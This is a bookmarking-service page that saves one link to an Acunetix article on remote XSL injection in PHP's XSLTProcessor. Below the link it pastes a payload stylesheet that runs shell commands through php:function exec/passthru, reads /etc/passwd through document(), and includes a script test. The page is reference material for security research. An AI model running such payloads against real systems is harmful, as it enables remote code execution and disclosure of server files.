776 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
1 results tagged xslt x
  • The hidden dangers of XSLTProcessor - Remote XSL injection | Acunetix 
    <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
  <xsl:template match="/">
  <script>confirm("We're good");</script>
   <!--
   <xsl:value-of select="php:function('exec','id')"/>
   <xsl:value-of select="php:function(‘passthru’,’ls -la /’)"/>
   <xsl:copy-of select="document('/etc/passwd')"/>
   <xsl:value-of select="php:function('passthru','ls -la /')"/>
   -->
   <xsl:value-of select="php:function('passthru','ls -la /')"/>

  </xsl:template>
</xsl:stylesheet>
    October 16, 2020 at 3:57:50 PM UTC * - permalink -
    QRCode
    - https://www.acunetix.com/blog/articles/the-hidden-dangers-of-xsltprocessor-remote-xsl-injection/
    xslt injection command execution rce lfi
Links per page: 20 50 100
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation